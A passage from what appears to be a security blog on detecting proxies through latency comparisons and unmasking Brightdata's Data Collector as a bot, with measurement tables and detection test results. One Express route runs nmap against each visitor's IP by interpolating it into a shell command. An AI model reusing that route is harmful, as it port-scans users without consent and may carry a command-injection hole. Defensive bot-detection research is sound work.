<span class="s2">"measurements"</span><span class="o">:</span> <span class="p">[</span><span class="mf">871.23</span><span class="p">,</span> <span class="mf">977.15</span><span class="p">,</span> <span class="mf">979.31</span><span class="p">,</span> <span class="mf">1012.47</span><span class="p">,</span> <span class="mf">1034.18</span><span class="p">,</span> <span class="mf">1147.83</span><span class="p">,</span> <span class="mf">1190.57</span><span class="p">,</span> <span class="mf">1229.74</span><span class="p">,</span> <span class="mf">1276.93</span><span class="p">,</span> <span class="mf">1287.49</span><span class="p">,</span> <span class="mf">1318.97</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div>
<p>Those are the results when considering the median values:</p>
<table>
<thead>
<tr>
<th>RTT TCP Handshake</th>
<th>RTT XMLHttpRequest</th>
<th>Uses a Proxy</th>
</tr>
</thead>
<tbody>
<tr>
<td>23</td>
<td>136</td>
<td>No</td>
</tr>
<tr>
<td>125</td>
<td>1034</td>
<td>Yes</td>
</tr>
</tbody>
</table>
<p>Those are definitely not enough samples. I needed to record real world samples with people all over the world
running the <code>XMLHttpRequest</code> technique script.</p>
<p>After having collected enough samples from real world users visiting my website, I can definitely say that the <code>XMLHttpRequest</code> technique to measure latencies is way too inaccurate. Therefore, the test site <a href="https://bot.incolumitas.com/latency.html">https://bot.incolumitas.com/latency.html</a> is not usable to detect tunnels such as Proxies or VPN's.</p>
<p>Reason: Modern browsers simply add too much unpredictable stalling and delays to <code>XMLHttpRequest</code> requests, therefore it's impossible to compare those samples to RTT's measured in the TCP/IP handshake.</p>
<h2>Testing the WebSocket Latency Technique</h2>
<p>The data collection method was as follows: I let the TCP/IP handshake python script from above run on my server. At the same time, I am recording the latency of five WebSocket messages with the <code>WebSocket</code> technique from above. Then I consider the median values from the five WebSocket latency measurements and the median value from the TCP/IP handshake latency. </p>
<p>Below are the latency samples from 11 (probably) real persons visiting my website on a Sunday afternoon:</p>
<table>
<thead>
<tr>
<th>RTT TCP Handshake</th>
<th>RTT WebSocket</th>
<th>Difference in %</th>
<th>Uses a Proxy</th>
</tr>
</thead>
<tbody>
<tr>
<td>79.83ms</td>
<td>86ms</td>
<td>7.7%</td>
<td>No</td>
</tr>
<tr>
<td>191ms</td>
<td>189ms</td>
<td>1.05%</td>
<td>No</td>
</tr>
<tr>
<td>175.8ms</td>
<td>178ms</td>
<td>1.2%</td>
<td>No</td>
</tr>
<tr>
<td>239.7ms</td>
<td>237ms</td>
<td>1.1%</td>
<td>No</td>
</tr>
<tr>
<td>40.1ms</td>
<td>41ms</td>
<td>2.2%</td>
<td>No</td>
</tr>
<tr>
<td>135.9ms</td>
<td>134.9ms</td>
<td>0.7%</td>
<td>No</td>
</tr>
<tr>
<td>116.0ms</td>
<td>104ms</td>
<td>11.5%</td>
<td>No</td>
</tr>
<tr>
<td>47ms</td>
<td>48ms</td>
<td>2.1%</td>
<td>No</td>
</tr>
<tr>
<td>135.9ms</td>
<td>133ms</td>
<td>2.1%</td>
<td>No</td>
</tr>
<tr>
<td>64ms</td>
<td>62ms</td>
<td>3.2%</td>
<td>No</td>
</tr>
<tr>
<td>207.9ms</td>
<td>236.7ms</td>
<td>13.8%</td>
<td>No</td>
</tr>
</tbody>
</table>
<p>As you can see, the difference between WebSocket latency and TCP/IP handshake is in most cases marginal. I assume that those visitors didn't use any proxy.</p>
<p>Obviously, I cannot say for sure, because after all, I want to find a way to detect proxy usage. But I am quite confident that they don't use proxies, because their browsing behavior appears to be organic and most my visitors don't use proxies (except on <a href="https://bot.incolumitas.com/">bot.incolumitas.com</a>).</p>
<p>Now it's time to collect samples from some scraping providers (such as <a href="https://brightdata.com/">Brightdata</a> or <a href="https://www.scrapingbee.com/">ScrapingBee</a>) and see how the latencies differ there. With those providers, I am very confident that they use proxies, so my hypothesis is the following: The latancies from the WebSocket messages should be significantly larger then the ones from the TCP Handshake.</p>
<table>
<thead>
<tr>
<th>Proxy Provider</th>
<th>RTT TCP Handshake</th>
<th>RTT WebSocket</th>
<th>Difference in %</th>
<th>Uses a Proxy</th>
</tr>
</thead>
<tbody>
<tr>
<td>Brightdata</td>
<td>135.8ms</td>
<td>231ms</td>
<td>70%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>122.3ms</td>
<td>228ms</td>
<td>86%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>103.9ms</td>
<td>210ms</td>
<td>102%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>151.1ms</td>
<td>224ms</td>
<td>48%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>128ms</td>
<td>198ms</td>
<td>54%</td>
<td>Yes</td>
</tr>
<tr>
<td>Brightdata</td>
<td>121.85ms</td>
<td>240ms</td>
<td>96%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>191.9ms</td>
<td>278.7ms</td>
<td>45%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>143.7ms</td>
<td>291ms</td>
<td>103%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>149.9ms</td>
<td>354.4ms</td>
<td>136%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>95.7ms</td>
<td>174.3ms</td>
<td>83%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>147.9ms</td>
<td>293.3ms</td>
<td>98%</td>
<td>Yes</td>
</tr>
<tr>
<td>ScrapingBee</td>
<td>95.7ms</td>
<td>177.3ms</td>
<td>86%</td>
<td>Yes</td>
</tr>
</tbody>
</table>
<p>The samples above confirm my hypothesis.</p>
<p>Indeed, the WebSocket latencies are at between 45% to 136% larger then their corresponding TCP handshake latencies. That is a significant difference compared to the largest difference of the <em>No Proxy</em> measurements from above (13.6%). Statistically speaking, we can determine with high probablity if the visiting user is using a proxy or not. Mission accomplished!</p>
<p>Some things to keep in mind:</p>
<ul>
<li>Sometimes, the latencies obtained from WebSockets have outliers. I assume that this is due to packet loss and re-transmission (WebSockets is a reliable protocol).</li>
<li>The downside with TCP/IP handshake RTTs is that there may also occur packet loss and thus skewed latency measurements. But because there are usually a couple of TCP/IP handshakes made when a browser visits my website, I can take the median value as well.</li>
</ul>Detecting Brightdata's (formerly Luminati Networks) Data Collector as a Bot2021-06-05T17:45:00+02:002021-06-06T12:46:00+02:00Nikolai Tschachertag:incolumitas.com,2021-06-05:/2021/06/05/detecting-brightdata-data-collector-as-bot/<p>In this blog article I demonstrate several bullet-proof ways how to detect <a href="https://brightdata.com/products/data-collector">Brightdata Data Collector</a> as a bot without any doubt.</p><h1>TL;DR</h1>
<p>It's very easy to detect <a href="https://brightdata.com/products/data-collector">Brightdata Data Collector</a> as bot. Brightdata former name was Luminati Networks.</p>
<p>The four largest findings to detect their data collector as bot:</p>
<ol>
<li>It's easy to demonstrate that the <code>navigator</code> object is heavily spoofed by comparing certain <a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API/Using_web_workers">Web Worker</a> <code>navigator</code> properties and <a href="https://developer.mozilla.org/en-US/docs/Web/API/Service_Worker_API">Service Worker</a> <code>navigator</code> properties to the DOM's <code>window.navigator</code> properties (such as <code>navigator.userAgent</code> or <code>navigator.platform</code>). Furthermore, it's possible to see that <code>HeadlessChrome</code> as a browser and <code>Linux x86_64</code> as a platform is used.</li>
<li>By comparing the network latencies from browser to server and from server to external IP address, it's possible to interpolate that proxies are used. Furthermore, the external IP's of <a href="https://brightdata.com/products/data-collector">Brightdata Data Collector</a> answer to ICMP ping packets (sometimes).</li>
<li>The TCP/IP fingerprint recorded with my own tool <a href="https://github.com/NikolaiT/zardaxt">zardaxt.py</a> indicates a different operating system (mostly Linux) than what is advertised in the HTTP User Agent header (which is mostly Windows 10)</li>
<li>It's possible to detect that the canvas <code>getImageData()</code> method was spoofed. There are several spoofing mechanisms and anti-canvas fingerprinting defenses that should not occur with real browsers.</li>
</ol>
<h1>Introduction</h1>
<p><a href="https://brightdata.com/">Brightdata</a> (formerly <em>Luminati Networks</em>) is probably the largest proxy provider on the planet.</p>
<p>Their main product is a large proxy network. They offer datacenter, residential and mobile proxies. They can do so, because their sister company <a href="https://hola.org/">hola.org</a> provides as browser extension that allows to share the network bandwith with other users of <a href="https://hola.org/">hola.org</a>. It's a peer-to-peer network and allows their often unaware clients to change their IP address to circumvent geo-blocking or remain anonymous. If you are not from Europe or the US, you very often have to endure ridiculous geo-blocking. That's why such services and VPN providers are in huge demand.</p>
<p>Put differently: <a href="https://hola.org/">hola.org</a> installs a proxy server on each person's computer/mobile phone and <a href="https://brightdata.com/">Brightdata</a> resells this bandwith/proxies as residential and mobile proxies to large business customers. There is no such thing as a free service. If it's free, then you are the product.</p>
<p>But most recently, <a href="https://brightdata.com/">Brightdata</a> also strongly pushed into the data collection niche (data as a service) by allowing their clients access to a full fledged browser with JavaScript capabilities that is hard to distinguish from a real human controlled browser. This service is called <a href="https://brightdata.com/products/data-collector">Brightdata Data Collector</a> and is the center of attention in this blog article.</p>
<figure>
<img src="https://incolumitas.com/images/brightdata.png" alt="Brightdata data collector" />
<figcaption>Brightdata data collector - Or: Best solution for sneaker bots?</figcaption>
</figure>
<p>As Brightdata's product marketing image above suggests, the data collector can be used to scrape search engines, prices from E-Commerce websites, scrape the most recent published real estate listings on realtor websites. If you have an advanced undetectable bot, you have an enormous advantage in the Internet, because speed and automatization is often a huge advantage in transactions were demand is high and supply is low.</p>
<p>In this blog post, my goal is to find some reliable ways to detect <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> as a bot.</p>
<h1>Approach</h1>
<p>I will use the following bot detection sites and visit them with <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a>. Put differently: Instead of scraping an arbitrary site such as Google, I will let the bot visit a bot detection site and investigate the results of the detection site.</p>
<ol>
<li><a href="https://abrahamjuliot.github.io/creepjs/">creepjs</a></li>
<li><a href="https://pixelscan.net/">pixelscan.net</a></li>
<li><a href="https://whatleaks.com/">whatleaks.com</a></li>
<li><a href="http://f.vision/">f.vision</a></li>
</ol>
<p>For each detected listing, I will try to re-implement the test that triggered the detection. Only when I am capable of re-implementing the detection test, I truly understand why a site claims to have detected the visitor as bot and I am able to craft my own judgement.</p>
<p>For each bot detection site listed above, I will request the site five times.</p>
<h1>Testing with whatleaks.com</h1>
<p>Here <a href="https://github.com/NikolaiT/detecting-brightdata/tree/main/whatleaks">is a link</a> to the <a href="https://whatleaks.com/">whatleaks.com</a> results.</p>
<p>I will use the following <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://whatleaks.com'</span><span class="p">);</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#doesNOtExit'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">230000</span><span class="p">})</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<figure>
<img src="https://incolumitas.com/images/whatLeaks.png" alt="Brightdata data collector" />
<figcaption>This is what the whatleaks.com results page looks like.</figcaption>
</figure>
<h4>Result 1: Data Collector IP found in Spam Blacklist</h4>
<p><a href="https://whatleaks.com/">whatleaks.com</a> claims: </p>
<div class="highlight"><pre><span></span><code><span class="n">Result</span><span class="o">:</span><span class="w"></span>
<span class="n">IP</span><span class="w"> </span><span class="n">found</span><span class="w"> </span><span class="k">in</span><span class="w"> </span><span class="n">blacklists</span><span class="w"> </span><span class="o">(</span><span class="mi">1</span><span class="o">)</span><span class="w"></span>
<span class="n">Name</span><span class="w"></span>
<span class="n">Description</span><span class="w"></span>
<span class="n">dnsbl</span><span class="o">.</span><span class="na">sorbs</span><span class="o">.</span><span class="na">net</span><span class="o">:</span><span class="w"></span>
<span class="n">Unsolicited</span><span class="w"> </span><span class="n">bulk</span><span class="o">/</span><span class="n">commercial</span><span class="w"> </span><span class="n">email</span><span class="w"> </span><span class="n">senders</span><span class="w"></span>
</code></pre></div>
<p>When looking up the IP address <code>184.91.1.148</code> on <a href="https://www.dnsbl.info/dnsbl-database-check.php">dnsbl.info</a> I can confirm the finding.</p>
<figure>
<img src="https://incolumitas.com/images/dnsbl.png" alt="Brightdata data collector" />
<figcaption>Brightdata IP address is listed on https://www.dnsbl.info/dnsbl-database-check.php</figcaption>
</figure>
<p>I have to idea how accurate <a href="https://www.dnsbl.info/dnsbl-database-check.php">dnsbl.info</a> is, but as a quick check, I looked up my own public IP address and there is also one spam report for my very own ISP IP (Detected on <code>b.barracudacentral.org</code>). So I would not consider those publicly accessible spam lookup databases as overly trustworthy.</p>
<p>With the other IP addresses of the other four samples I got a similar result.</p>
<h4>Result 2: Ping - Proxy usage detected in Connection</h4>
<p>When looking up the test description on <a href="https://whatleaks.com/">whatleaks.com</a>:</p>
<blockquote>
<p>We compare ping from your computer to our server and ping from our server to the host of your external IP. If the difference is too much then there is probably a tunnel and you are using a proxy.</p>
</blockquote>
<p>I re-implemented this ping proxy detection test in <a href="http://localhost:8000/2021/04/24/detecting-proxies/">my last blog article</a> where I also quickly programmed my own test. Link to my own ping-based proxy detection test: <a href="https://bot.incolumitas.com/crossping.html">bot.incolumitas.com/crossping.html</a></p>
<p>For example, those are the results of the crossping test when letting <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> visit my <a href="https://bot.incolumitas.com/crossping.html">crossping test site</a>:</p>
<p>Test Run 1:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-0"</span><span class="p">:</span><span class="w"> </span><span class="mf">914.4649999216199</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-1"</span><span class="p">:</span><span class="w"> </span><span class="mf">1014.5399998873472</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-2"</span><span class="p">:</span><span class="w"> </span><span class="mf">1015.4400002211332</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-3"</span><span class="p">:</span><span class="w"> </span><span class="mf">1101.740000769496</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-4"</span><span class="p">:</span><span class="w"> </span><span class="mf">1102.8800001367927</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-0"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 134.796 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 131.744 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-2"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 133.993 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-3"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 139.276 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-4"</span><span class="p">:</span><span class="w"> </span><span class="s2">"72.180.224.177 - OK 137.525 ms"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>Test Run 2:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-0"</span><span class="p">:</span><span class="w"> </span><span class="mf">717.8099993616343</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-3"</span><span class="p">:</span><span class="w"> </span><span class="mf">959.8300000652671</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-4"</span><span class="p">:</span><span class="w"> </span><span class="mf">962.6200003549457</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-1"</span><span class="p">:</span><span class="w"> </span><span class="mf">1128.740000538528</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-2"</span><span class="p">:</span><span class="w"> </span><span class="mf">1131.4850002527237</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-0"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 93.502 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 92.907 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-2"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 92.825 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-3"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 92.782 ms"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-4"</span><span class="p">:</span><span class="w"> </span><span class="s2">"45.130.83.183 - OK 92.935 ms"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>And this is me with my own Laptop and Browser and without any proxy visiting my detection site:</p>
<div class="highlight"><pre><span></span><code><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-0"</span><span class="p">:</span><span class="w"> </span><span class="mi">107</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-1"</span><span class="p">:</span><span class="w"> </span><span class="mi">114</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-4"</span><span class="p">:</span><span class="w"> </span><span class="mf">116.59999999962747</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-2"</span><span class="p">:</span><span class="w"> </span><span class="mf">119.80000000074506</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"browserToServer-3"</span><span class="p">:</span><span class="w"> </span><span class="mf">190.09999999962747</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-0"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-1"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-2"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-3"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nt">"serverToExternalIP-4"</span><span class="p">:</span><span class="w"> </span><span class="s2">"84.152.212.142 - FAIL"</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>As you can see, the ping time for <code>browserToServer</code> is significantly higher for <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> compared to my own browser (without any bot). And of course I cannot ping my own IP address <code>84.152.212.142</code> from my webserver, because I am behind a NAT.</p>
<p>If I really need reliable <code>serverToExternalIP</code> measurements, I could obtain correct latencies for <code>serverToExternalIP</code> by measuring the TCP handshake RTT.</p>
<p>So what can we say from the tests above? </p>
<p>In both cases when using <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a>, the latencies were quite high with around 1 second. This stands in contrast to very small latencies around 100ms when visiting the test with my own browser without any proxy. Of course geolocation latencies need to be kept in mind, but usually geolocation induced latencies don't add up to more than 200ms - 300ms. </p>
<p>In conclusion I can say that I am quite confident that it must be possible to apply some statistics and make a statement such as: The <code>browserToServer</code> latencies are significantly higher than the <code>serverToExternalIP</code> latencies and therefore we can conclude that there must be some intermediary in the connection!</p>
<h4>Result 3: Data Collector IP has Open Ports</h4>
<p>I implemented a simple portscan route on my Express web server:</p>
<div class="highlight"><pre><span></span><code><span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/portscan'</span><span class="p">,</span> <span class="k">async</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// ping the external IP address</span>
<span class="kd">let</span> <span class="nx">ip</span> <span class="o">=</span> <span class="nx">getIp</span><span class="p">(</span><span class="nx">req</span><span class="p">);</span>
<span class="kd">let</span> <span class="nx">command</span> <span class="o">=</span> <span class="sb">`nmap -p3389,5900,5901,5938,5939,5279 </span><span class="si">${</span><span class="nx">ip</span><span class="si">}</span><span class="sb"> 2>&1`</span><span class="p">;</span>
<span class="kd">const</span> <span class="p">{</span> <span class="nx">stdout</span><span class="p">,</span> <span class="nx">stderr</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">exec</span><span class="p">(</span><span class="nx">command</span><span class="p">);</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">header</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span><span class="s1">'application/json'</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">ip</span> <span class="o">+</span> <span class="s1">' - '</span> <span class="o">+</span> <span class="nx">stdout</span><span class="p">.</span><span class="nx">trim</span><span class="p">());</span>
<span class="p">});</span>
</code></pre></div>
<p>Test site: <a href="https://abs.incolumitas.com/portscan">portscan</a></p>
<p><a href="https://whatleaks.com/">whatleaks.com</a> claims that <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> has open ports:</p>
<figure>
<img src="https://incolumitas.com/images/whatLeaksPorts.png" alt="Several Open Ports detected by whatleaks.com" />
<figcaption>Several Open Ports detected by whatleaks.com</figcaption>
</figure>
<p>I could reproduce those findings with my portscan method above. See the image below for proof:</p>
<figure>
<img src="https://incolumitas.com/images/portscanWL.png" alt="Several Open Ports detected by whatleaks.com" />
<figcaption>Several Open Ports detected by my port scanning function</figcaption>
</figure>
<p>I assume that Brightdata defends against port scanning with restrictive <code>iptables</code> rules, that's why I only get <code>filtered</code> as result. But undoubtedly, those ports are open.</p>
<h4>Result 4: Data Collector's TCP/IP Fingerprint different from claimed Browser User Agent</h4>
<p>I will use my own TCP/IP fingerprinting tool named <a href="https://github.com/NikolaiT/zardaxt/">zardaxt.py</a> to conduct this test. </p>
<p>Link to the TCP/IP detection test site: <a href="https://bot.incolumitas.com/tcpip.html">bot.incolumitas.com/tcpip.html</a></p>
<p>When visiting the <a href="https://whatleaks.com/">whatleaks.com</a> test site with <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a>, the site detects a passive OS fingerprint of <code>Linux</code> but a <code>Windows</code> OS according to the User Agent.</p>
<figure>
<img src="https://incolumitas.com/images/wlfp.png" alt="Several Open Ports detected by whatleaks.com" />
<figcaption>Linux as detected by the TCP/IP fingerprint, but User Agent says Windows</figcaption>
</figure>
<p>Replication: When testing <a href="https://brightdata.com/products/data-collector">Brightdata's data collector</a> three times with my <a href="https://bot.incolumitas.com/tcpip.html">own TCP/IP fingerprinting tool</a>, I get the following results:</p>
<figure>
<img src="https://incolumitas.com/images/tcpip-zxt1.png" alt="TCP/IP fingerprint for Brightdata data collector" />
<figcaption>Here it is quite obvious that the User Agent OS is different compared to the TCP/IP fingerprint OS. The TCP/IP fingerprint is most likely Linux.</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/tcpip-zxt2.png" alt="TCP/IP fingerprint for Brightdata data collector" />
<figcaption>Here zardaxt.py fails to make a convincing statement. However, the score for Windows is the lowest, although the User Agent says it's a Windows device...</figcaption>
</figure>
<figure>
<img src="https://incolumitas.com/images/tcpip-zxt3.png" alt="TCP/IP fingerprint for Brightdata data collector" />
<figcaption>Here the User Agent OS matches the suggested TCP/IP fingerprint OS. This one looks legit.</figcaption>
</figure>
<h1>Testing with creepjs</h1>
<p>Here <a href="https://github.com/NikolaiT/detecting-brightdata/tree/main/creepjs">is a link</a> to the <a href="https://abrahamjuliot.github.io/creepjs/">creepjs</a> results.</p>
<p>I will use the following <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://abrahamjuliot.github.io/creepjs/'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">230000</span><span class="p">});</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#fingerprint-data > div:nth-child(3) > div:nth-child(2) a'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#fingerprint-data > div:nth-child(3) > div:nth-child(2) a'</span><span class="p">);</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<p>CreepJS is really devastating in it's opinion about <a href="https://brightdata.com/products/data-collector">Brightdata data collector</a>. It gives a trust score of <strong>0%</strong>, see the image below:</p>
<figure>
<img src="https://incolumitas.com/images/creepJS.png" alt="creepjs results page" />
<figcaption>This is what the creepjs results page look like. The data collector gets the worst trust score possible.</figcaption>
</figure>
<p>The <a href="https://abrahamjuliot.github.io/creepjs/">creepjs</a> bot detection site is a gold mine. Even better, the library is <a href="https://github.com/abrahamjuliot/creepjs">open source</a>.</p>
<p>There are so many findings, it's hard to list them all. Let's get started:</p>
<h4>Result 1: Service Worker navigator differs from main navigator</h4>
<figure>
<img src="https://incolumitas.com/images/creepSW.png" alt="creepjs results page" />
<figcaption>creepjs reports that Service Worker navigator properties show the un-spoofed values for the real navigator property</figcaption>
</figure>
<p>To put it shortly, modern browsers have something called <a href="https://developers.google.com/web/fundamentals/primers/service-workers">Service Workers</a>. It's basically a proxy layer that sits between the web application and the server and adds offline-mode features (amongst others).</p>
<p>In the context of <a href="https://developers.google.com/web/fundamentals/primers/service-workers">Service Workers</a>, there is also a <code>navigator</code> property.</p>
<p>My claim (and of course creepjs's claim) is: The bot programmers forgot to spoof those values like they did with main <code>navigator</code> property.</p>
<p>Therefore, I implemented a test that compares the <code>navigator</code> values from the DOM with the values from the Service Worker context. Link to test: <a href="https://bot.incolumitas.com/sw.html">https://bot.incolumitas.com/sw.html</a></p>
<p>This is the result:</p>
<figure>
<img src="https://incolumitas.com/images/sw-mismatch.png" alt="creepjs results page" />
<figcaption>boom - detected</figcaption>
</figure>
<p>Do you see what I see?</p>
<p>The bot claims to be <code>Win32</code> but is <code>Linux x86_64</code> when inspecting <code>navigator.platform</code></p>
<p>The bot claims to be <code>Chrome/90.0.4430.72</code> but is <code>HeadlessChrome/90.0.4430.93</code> when inspecting <code>navigator.userAgent</code>.</p>
<p>Totally busted.</p>
<h4>Result 2: Web Worker navigator differs from main navigator</h4>
<p>Same logic here, expect that <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> spoof's a bit more with <a href="https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API">Web Workers</a>, so it's less fatal, but still enough to detect them as bot.</p>
<p>Link to test: <a href="https://bot.incolumitas.com/ww.html">https://bot.incolumitas.com/ww.html</a></p>
<figure>
<img src="https://incolumitas.com/images/ww-mismatch.png" alt="creepjs results page" />
<figcaption>boom - detected</figcaption>
</figure>
<p>Same as with Service Workers above, the bot claims to be <code>Win32</code> but is <code>Linux x86_64</code> when inspecting <code>navigator.platform</code>.</p>
<p>The User Agent is correctly spoofed, unlike with Service Workers above.</p>
<p>But <code>["en-US"]</code> as taken from <code>navigator.languages</code> is different to <code>["en-US","en"]</code>.</p>
<p>It's enough to see that the browser <em>lies</em>. The values are not consistent.</p>
<h1>Testing with pixelscan.net</h1>
<p>Here <a href="https://github.com/NikolaiT/detecting-brightdata/tree/main/pixelscan">is a link</a> to the <a href="https://pixelscan.net/">pixelscan.net</a> results.</p>
<p>I will use the following <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'https://pixelscan.net/'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">230000</span><span class="p">});</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#doesNOtExit'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">230000</span><span class="p">})</span>
<span class="nx">collect</span><span class="p">({</span>
<span class="nx">url</span><span class="o">:</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">,</span>
<span class="p">});</span>
</code></pre></div>
<h1>Testing with f.vision</h1>
<p>Here <a href="https://github.com/NikolaiT/detecting-brightdata/tree/main/f.vision">is a link</a> to the <a href="http://f.vision/">f.vision</a> results.</p>
<p>I will use the following <a href="https://brightdata.com/products/data-collector">Brightdata data collector </a> script:</p>
<div class="highlight"><pre><span></span><code><span class="nx">navigate</span><span class="p">(</span><span class="s1">'http://f.vision'</span><span class="p">,</span> <span class="p">{</span><span class="nx">timeout</span><span class="o">:</span> <span class="mf">60000</span><span class="p">});</span>
<span class="nx">wait</span><span class="p">(</span><span class="s1">'#start-button > span'</span><span class="p">);</span>
<span class="nx">click</span><span class="p">(</span><span class="s1">'#start-button > span'</span><span class="p">);</span>
